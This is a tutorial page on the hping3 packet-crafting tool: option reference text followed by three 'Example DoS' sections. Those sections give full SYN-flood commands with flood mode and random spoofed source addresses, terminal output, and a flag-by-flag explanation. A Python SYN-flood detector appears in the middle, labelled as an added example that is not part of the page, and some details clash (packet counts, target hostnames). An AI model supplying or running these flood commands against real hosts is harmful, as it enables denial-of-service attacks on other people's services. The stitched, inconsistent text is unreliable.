Hping3

Description

hping3 is a network tool able to send custom TCP/IP packets and to display target replies, much as the ping program does with ICMP replies. hping3 handles fragmentation and arbitrary packet body and size, and can be used to transfer files encapsulated in the supported protocols. Using hping3 you are able to perform at least the following tasks:

– Test firewall rules
– Advanced port scanning
– Test network performance using different protocols, packet sizes, TOS (type of service) and fragmentation
– Path MTU discovery
– Transferring files even through really fascist firewall rules
– Traceroute-like under different protocols
– Firewalk-like usage
– Remote OS fingerprinting
– TCP/IP stack auditing
– A lot of others

Base Options

-h --help

Show a help screen on standard output, so you can pipe it to less.

-v --version

Show version information and the API used to access the data link layer: Linux sock packet or libpcap.

-c --count count

Stop after sending (and receiving) count response packets. After the last packet is sent, hping3 waits COUNTREACHED_TIMEOUT seconds for target host replies. You can tune COUNTREACHED_TIMEOUT by editing hping3.h.

-i --interval

Wait the specified number of seconds or microseconds between sending each packet. --interval X sets the wait to X seconds, --interval uX sets it to X microseconds. The default is to wait one second between packets. When using hping3 to transfer files, tuning this option is really important in order to increase the transfer rate. Even when using hping3 to perform idle/spoofing scanning you should tune this option; see HPING3-HOWTO for more information.

--fast

Alias for -i u10000. hping3 will send 10 packets per second.

--faster

Alias for -i u1. Faster than --fast (but not as fast as your computer can send packets, due to the signal-driven design).

--flood

Send packets as fast as possible, without taking care to show incoming replies. This is much faster than specifying the -i u0 option.

-n --numeric

Numeric output only; no attempt will be made to look up symbolic names for host addresses.

-q --quiet

Quiet output. Nothing is displayed except the summary lines at startup time and when finished.

-I --interface interface name

By default on Linux and BSD systems hping3 uses the default routing interface. On other systems, or when there is no default route, hping3 uses the first non-loopback interface. However, you can force hping3 to use the interface you need with this option. Note: you don't need to specify the whole name; for example -I et will match eth0, ethernet0, myet1 et cetera. If no interface matches, hping3 will try to use lo.

-V --verbose

Enable verbose output. TCP replies will be shown as follows:

len=46 ip=192.168.1.1 flags=RA DF seq=0 ttl=255 id=0 win=0 rtt=0.4 ms tos=0 iplen=40 seq=0 ack=1380893504 sum=2010 urp=0

-D --debug

Enable debug mode; it is useful when you experience problems with hping3. When debug mode is enabled you will get more information about interface detection, data link layer access, interface settings, option parsing, fragmentation, the HCMP protocol and other things.

-z --bind

Bind CTRL+Z to time to live (TTL), so you will be able to increment/decrement the TTL of outgoing packets by pressing CTRL+Z once or twice.

-Z --unbind

Unbind CTRL+Z so you will be able to stop hping3.

--beep

Beep for every matching received packet (but not for ICMP errors).

Example DoS using hping3

cyborg@cyborg:~$ sudo hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood --rand-source www.example.com

HPING www.example.com (lo 127.0.0.1): S set, 40 headers + 120 data bytes
hping in flood mode, no replies will be shown

^C
--- www.example.com hping statistic ---
1189112 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
cyborg@cyborg:~$

Let me explain the syntax used in this command:

  1. hping3 = Name of the application binary.

  2. -c 100000 = Number of packets to send.

  3. -d 120 = Size of each packet sent to the target machine.

  4. -S = I am sending SYN packets only.

  5. -w 64 = TCP window size.

  6. -p 21 = Destination port (21 being the FTP port). You can use any port here.

  7. --flood = Send packets as fast as possible, without taking care to show incoming replies. Flood mode.

  8. --rand-source = Use random source IP addresses. You can also use -a or --spoof to hide hostnames. See the hping3 man page.

  9. www.example.com = Destination IP address or the target machine's IP address. You can also use a website name here. In my case it resolves to 127.0.0.1 (as entered in the /etc/hosts file).

Simple SYN flood – DoS using HPING3

cyborg@cyborg:~$ sudo hping3 -S --flood -V www.hping3testsite.com
using lo, addr: 127.0.0.1, MTU: 65536
HPING www.example.com (lo 127.0.0.1): S set, 40 headers + 0 data bytes
hping in flood mode, no replies will be shown
^C
--- www.example.com hping statistic ---
746021 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
cyborg@cyborg:~$

Simple SYN flood with spoofed IP – DoS using HPING3

cyborg@cyborg:~$ sudo hping3 -S -P -U --flood -V --rand-source www.example.com
using lo, addr: 127.0.0.1, MTU: 65536
HPING www.example.com (lo 127.0.0.1): SPU set, 40 headers + 0 data bytes
hping in flood mode, no replies will be shown
^C
--- www.example.com hping statistic ---
554220 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
cyborg@cyborg:~$
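A defender's counterpart to the three floods shown above, as an added example that is not part of this page or of hping3: a small Python heuristic that scores one window of constructed client-to-server packet records for the signature these commands leave behind, a burst of bare SYNs to one destination port, nearly every SYN from a distinct source (the --rand-source case), and no ACK ever completing a handshake. The record format, the thresholds and the sample data are assumptions chosen for the illustration.

```python
"""SYN-flood heuristic for one window of client-to-server TCP packet records
(added example, not hping3 code). Records are (src_ip, dst_port, flags) with
hping3-style flag letters. The floods above show up as a high SYN rate, nearly
every SYN from a distinct source, and no ACKs completing a handshake."""
from collections import Counter
from dataclasses import dataclass


@dataclass
class Verdict:
    syns: int            # bare SYNs seen in the window
    unique_sources: int  # distinct source addresses among those SYNs
    acks: int            # bare ACKs (handshake completions / data)
    top_port: int        # destination port receiving most SYNs, -1 if none
    flooded: bool        # SYN rate high and almost nothing completes
    spoofed: bool        # source diversity consistent with --rand-source


def analyze(records, window_s, syn_rate_threshold=1000.0,
            completion_floor=0.05, spoof_ratio=0.9):
    """Score one window of records; the thresholds are tunable assumptions."""
    syn_sources, port_hits, acks = Counter(), Counter(), 0
    for src, dport, flags in records:
        if "S" in flags and "A" not in flags:  # bare SYN: new connection attempt
            syn_sources[src] += 1
            port_hits[dport] += 1
        elif flags == "A":                     # client ACK: handshake completed
            acks += 1
    syns, uniq = sum(syn_sources.values()), len(syn_sources)
    top_port = port_hits.most_common(1)[0][0] if port_hits else -1
    rate = syns / window_s if window_s > 0 else 0.0
    completion = acks / syns if syns else 1.0
    flooded = rate > syn_rate_threshold and completion < completion_floor
    spoofed = syns > 0 and uniq / syns >= spoof_ratio
    return Verdict(syns, uniq, acks, top_port, flooded, spoofed)


def constructed_flood(n=5000, dport=21):
    """Constructed sample: n SYNs from n distinct sources to one port, no ACKs."""
    return [(f"10.0.{(i >> 8) & 255}.{i & 255}", dport, "S") for i in range(n)]


def constructed_normal():
    """Constructed sample: 20 handshakes from three hosts, each followed by data."""
    recs = []
    for i in range(20):
        src = f"192.168.1.{10 + i % 3}"
        recs += [(src, 80, "S"), (src, 80, "A"), (src, 80, "A")]
    return recs
```

Feeding the flood sample through `analyze(constructed_flood(), window_s=1.0)` reports a flooded, spoofed window aimed at port 21, while the normal sample is neither; in practice the records would come from a flow exporter or packet capture and the thresholds would be tuned to the link's baseline.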

©2017 Ztrela Knowledge Solutions Pvt. Ltd